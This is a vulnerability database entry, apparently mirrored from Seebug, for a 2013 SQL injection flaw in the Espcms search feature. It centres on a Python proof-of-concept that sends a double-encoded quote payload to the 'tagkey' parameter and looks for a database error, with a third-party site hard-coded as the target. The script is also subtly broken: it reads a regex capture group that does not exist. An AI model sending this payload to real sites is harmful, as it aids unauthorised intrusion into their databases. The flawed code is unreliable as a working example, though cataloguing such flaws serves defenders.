Lucene search
K

Espcms 通杀 SQL注入漏洞

🗓️ 11 Mar 2013 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 20 Views

Espcms SQL injection vulnerability in search functionality

Code

                                                #!/usr/bin/env python   
import re  
import urlparse  
  
def assign(service, arg):  
    if service != "espcms":  
        return  
    return True, arg  
  
def audit(arg):  
    url = arg  
    code, head, res, errcode, _ = curl.curl(url + 'index.php?ac=search&at=taglist&tagkey=a%2527')  
    if code == 200:  
        m = re.search('ESPCMS SQL Error:', res)  
        if m:  
            security_info(m.group(1))  
  
  
if __name__ == '__main__':  
    from dummy import *  
    audit(assign('espcms','http://www.cnseay.com/')[1])
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Mar 2013 00:00Current
7.1High risk
Vulners AI Score7.1
20